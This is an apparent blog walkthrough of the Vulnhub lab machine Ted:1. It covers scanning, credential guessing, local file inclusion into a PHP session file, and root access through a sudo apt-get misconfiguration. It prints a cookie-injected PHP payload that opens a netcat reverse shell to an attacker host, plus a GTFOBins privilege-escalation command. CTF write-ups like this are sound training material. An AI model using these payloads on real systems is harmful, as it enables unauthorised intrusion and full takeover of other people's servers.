Ted:1 Vulnhub Walkthrough

September 24, 2020 by Nasef


Ted:1 is a machine in which I used Local File Inclusion Vulnerability to obtain shell access and then exploited the misconfigured sudo permissions to get root Access.


As always, I started scanning with nmap

nmap -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 09:58 EDT
Nmap scan report for
Host is up (0.00077s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds

Port 80 is the only opened port.

Web Enumeration

Then I enumerated directories and files using gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -x html,php
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php
[+] Timeout:        10s
2020/09/24 09:58:18 Starting gobuster
/index.php (Status: 200)
/home.php (Status: 302)
/logout.php (Status: 302)
/cookie.php (Status: 302)
/authenticate.php (Status: 302)
/server-status (Status: 403)
2020/09/24 09:59:06 Finished

An intersting file is cookie.php, although it didn’t help me to get a shell but it gave me a hint about using cookie with LFI to gain a shell.

Brute forcing

I found a login form in index.php, So I tried SQLmap to test for SQL injection but the form isn’t vulnerable to it. Then, I started testing with inputs and error messages and it was fruitful. The error messages gave me hints about the the correct username and correct password then the correct hashing algorithm. You can see the diffrence below.

Username guessing


Password guessing


Hashing Algorithm guessing


The correct username is admin and the correct password is hash sha256 of word admin

Local File Inclusion

When I typed /etc/passwd it retrived the content of the file, so it’s clearly a LFI vulnerability. Hash

After many attemps like reading /etc/shadow and Log poisoning via apache logs, I found a suspicous cookie. so I tried to change it’s value and access /var/lib/php/sessions/sess_ via the browser and it worked! Hash

Immediately I changed the cookie value to

<?php system("nc [ip] 9999 -e /bin/sh")?>

but URL encoded as


and started listening in my machine and refreshed the page. I got a shell!

root@kali:/home/kali# nc -lvnp 9999
listening on [any] 9999 ...
connect to [] from (UNKNOWN) [] 57674

Privilege Escalation

I ran sudo -l and noticed that I can run apt-get as a root without password (SUDO).

sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,

User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/apt-get

So imediatly I went to https://gtfobins.github.io/ and got the following command which abuses the sudo priv given to the binary apt-get

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

and voila here is the root privilege!